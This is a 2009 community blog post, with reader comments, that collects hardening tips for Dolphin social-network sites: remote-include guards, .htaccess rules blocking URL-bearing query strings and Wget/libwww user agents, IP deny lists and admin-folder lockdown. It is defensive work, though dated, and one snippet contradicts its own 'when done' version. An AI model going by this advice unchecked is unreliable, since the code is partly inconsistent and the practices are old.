Dolphin Security Roundup - Has Your Site Been Hacked?

jtadeo posted 22nd of May 2009 in Community Voice. 15 comments.

At some point in your site's existence, there will be attempts that will be made to hack your site. I know several months ago there was a rash of Dolphin sites being compromised as hackers had intensely targetted the app.

To be clear, this is not relegated only to Dolphin but to all apps. All sites get hacked.

Hackers have compromised sites like Facebook , MySpace, Twitter and I am sure many that has been or has yet to be reported. While you can't stop a hacker from trying to get to your site, you can definitely make it more work by applying some of the techniques listed below. I've rounded the first batch in this blog. This is a compilation of the ones I've found very helpful. There are others, I am sure, and if you have a link, please send it to me for inclusion.


RAY FILES - HTMLSax3 Fix for dolphin exploit

SOURCE: sammie - http://www.boonex.com/unity/blog/entry/Fix_for_dolphin_exploit

1. Add the following to your ray/modules/global/inc/content.inc.php :

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

So that, when you're done it looks like this:

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");

This prevents hackers from using any remote include files to used against your site.

2. Add the following to your /plugins/safehtml/HTMLSax3.php:

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

So when you're done, it looks like this:

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );

This prevents remotes access to your directories.


DOLPHIN ROOT - .htaccess file located in the root of your site

SOURCE: Dialme.com

This will block remote files from being included in your remote files:

RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]

Block others from viewing your .htaccess files in a web browser:
yoursite.com/.htaccess (near the bottom add)

<Files .htaccess>
deny from all
</Files>

You can also deny ip addresses in single or in ranges:

<Files *>
order deny,allow
deny from 191.0.0.0
deny from 195.0.0.0
</Files>

<Files *>
deny from 124.187.
deny from 58.0.0.0/8
allow from 58.121.39.45
</Files>

FOR ALL DIRECTORIES THAT HAVE BEEN 777'D

SOURCE: Dialme.com

.htaccess files are recursive meaning that if you put one in a directory all the subdirectories are effected. So in my media directory I block ALL scripts like this:

That "limitexcept" blocks all "put" and "post" requests too. You CAN'T use this in a directory that has .php files inside it.. or any of the sub-dirs. But it SHOULD be inside ALL the /files directories for each ray widget, and the /media directory.

Sample locations:
yoursite.com/media/.htaccess
yoursite.com/ray/modules/movie/files/.htaccess
yoursite.com/ray/modules/mp3/files/.htaccess
yoursite.com/ray/modules/music/files/.htaccess

Code:

<LimitExcept GET>
Order deny,allow
deny from all
</LimitExcept>

<FilesMatch "\.(cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|js.*|gz|tgz|tar|php.*|htm.*)$">
Deny from all
</FilesMatch>


LOCK DOWN THE ADMIN FOLDER

SOURCE: Dialme.com

Let's make it so even if a hacker gets his credentials in your database he STILL can't get in the admin... put this inside the .htaccess that is in your /admin directory:

For example:

<Files *>
order deny,allow
deny from all
allow from 192.168.0.1
</Files>

The ip addresses listed will be allowed to access the admin.

This way even if someone gets YOUR password and login they STILL can't get inside the admin area.

*If your ip changes than this probably isn't the best solution. You will still be able to access ftp regardless of your ip address. This just blocks web access to your admin folder other than the 2 ip's specified. So even if your ip did change you can just ftp into your admin directory and update the ip's with your new ip addresses to allow.


HIDE THE HOMEPAGE

Source: MakeASocialNetwork.com

Several of the hacking groups only do one thing when they DO get in.. they change your homepage to their logo (defacement). Just like #1 this is automated.. they overwrite index.php or add one. Well what if your homepage isn't index.php?? Even if their bot gets one in none of your visitors will ever know :-) How? Simple, rename your index.php (in this example myindex.php) and then put this in your .htaccess:

DirectoryIndex myindex.php
and inside the mod_rewrite block:

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /index\.php\ HTTP/
RewriteRule ^index\.php$ http://www.yoursite.com/ [R=301,L]

So any request for http://www.yoursite.com/index.php will be directed to http://www.yoursite.com/ and the new homepage is really myindex.php
If you do this then you need put a line setting it back to index.php inside all the other directories (like admin and ray) OR change it in them too.
Let them wrap their minds around why they got their bogus file in but it isn't showing :-)


REDIRECT THEM IF THEY'RE NOT SUPPOSE TO BE THERE USING PHP

Source: BoonexNerd.net

Add an index.php file in the root of a directory that you want to access only if the person knows the exact URL. You can add the following to the index.php file:

<?
header( "HTTP/1.1 301 Moved Permanently" );
header( "Status: 301 Moved Permanently" );
header( "Location: http://www.boonexnerd.net" );
//exit(0); //jt note - in some cases you may need to uncomment this out. To uncomment, delete the two forward slashes in front of exit(0)
?>


REDIRECT THEM IF THEY'RE NOT SUPPOSE TO BE THERE USING .HTACCESS

Source: BoonexNerd.net

Another way to redirect a curious user is by adding the following to your .htacess file. The example below redirects traffic from my Boonexnerd.com site over to my Boonexnerd.net site:

#-------------------------Redirect START --------------------------------------
#Apache Mod-Rewrite moduled must be enabled in order for this redirect to work
RewriteCond %{HTTP_HOST} ^www.boonexnerd.com [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]

RewriteCond %{HTTP_HOST} ^boonexnerd.com/testredirect/ [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
#-------------------------Redirect END --------------------------------------

Just replace my domain with yours. One question you may ask is, "Where do I put this thing?". Here's an example of placement:

Open your .htaccess file and add this to the file:

<IfModule mod_rewrite.c>
RewriteEngine on

#-------------------------Redirect START --------------------------------------
#Apache Mod-Rewrite moduled must be enabled in order for this redirec to work
RewriteCond %{HTTP_HOST} ^www.boonexnerd.com [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]

RewriteCond %{HTTP_HOST} ^boonexnerd.com/testredirect/ [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
#-------------------------Redirect END --------------------------------------

RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]
</IfModule>


SET REGISTER GLOBALS TO OFF

SOURCE: http://www.boonex.com/unity/forums/topic/Dolphin-not-secure-Hacked-.htm

gameutopia says:
First thing to do is to determine if register_globals is on or off. You can login to your admin panel first then visit:
yoursite.com/admin/phpinfo.php

Scroll down until you see register_globals
You should see to columns local and master. Master is what you host has specified. And local would be your site/directory. You can over ride your hosts master value by using .htaccess on php apache servers or php.ini with cgi servers.

The code varies slightly.

For php apache servers add to your main .htaccess file yoursite.com/.htaccess:
php_flag register_globals off

For cgi servers add to or edit your current php.ini file in yoursite.com/php.ini:
register_globals = Off

If you don't have php.ini make one with the above line and call it php.ini (cgi-servers only)
Else ask your host for certain and/or exact location to put php.ini

Go back to yoursite.com/admin/phpinfo.php and refresh page to verify the changes were successful ie...register_globals changed from on to off for certain in the local value, but if both local and master change that is ok too.


RUN A VIRUS CHECK ON YOUR FILES

Source: BoonexNerd.net

Keep your files healthy. Have a look at some of these FREE Antivirus Programs
http://www.avast.com/eng/download-avast-home.html
http://www.free-av.com/


OTHER SITES THAT ARE HELPFUL FOR SECURITY ISSUES

Source: BoonexNerd.net

http://www.wizcrafts.net/chinese-blocklist.html
This will list ip addresses for blocking.

http://www.wizcrafts.net/exploited-servers-blocklist.html
This will list exploited servers.

http://www.changedetection.com/
This will monitor your site

And this one is not necessarily a direct defense against hackers but services that will alert you if something has gone wrong with your site. These services will keep an eye on your site and will ping and xing your site based on intervals and will report any weirdness that may have occurred.

http://www.montastic.com/
http://mon.itor.us/
http://site24x7.com/

The last one on the list I've used and will also monitor if the content on your site has changed. For example, if the front page got defaced.

So there you have it, some of the fixes and updates that you may want to add to your own files in order to harden your site just a bit.

And finally, I have a daily list of ip addresses that have attempted to compromise my nerd site. If you are interested in getting the list please let me know. I will send you a daily/weekly report of suspected hackers based on my own server being attacked.

...sip...

 
Comments
·Oldest
·Top
Please login to post a comment.
theguypc
Fantastic post - thank you!
Thanks a bunch, this will help a lot of ppl as getting your site hacked is a major issue..
HotGate
Very helpful .. even for us. Thumbs up !
mallorca
Great post - thank you!
Juker
James,

Truly valuable and beneficial post. Thank you.

I am very interested in receiving the list of suspected hackers. How do I block the hackers once I have the list? Do I plug them into the Dolphin Root .htaccess mentioned above and are there other places to possibly block them?

Duh?

Juker
jtadeo
Hey Juker :D

Thanks to you and everyone who chimed in. Here's a sample .htaccess file that shows placement of the deny ip addresses:

http://www.boonexnerd.net/dolphin/htaccessSample.txt

In terms of the list, I've used the list from http://www.wizcrafts.net/. I am also making my own list to share with those who want it. It will be a page where you can download the ip addresses who have attempted to hack my site.

...sip...
totallyfreak
boonex should add these line into their original script... what do you think ???
grv
The best post I seen. Well done Jtadeo.
jtadeo
Thanks guys. I used Google and the handy dandy search bar in this forum to compile this info a neat package.

When I find useful information I will bookmark it and then take note of the parts that were important.

The reality is I just put it together...he he hee... Much of the credit really goes to the ones who actually wrote the info.

...sip...
Mayki
Nice collection in one place, I agree.
The best way to stop all (or almost all) unwanted spam and similar bots is (if you host on your own server) to use iptables ( linux iptables=firewal) and a script for auto updating blacklist.
If someone is intrested I can help....
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.063711881637573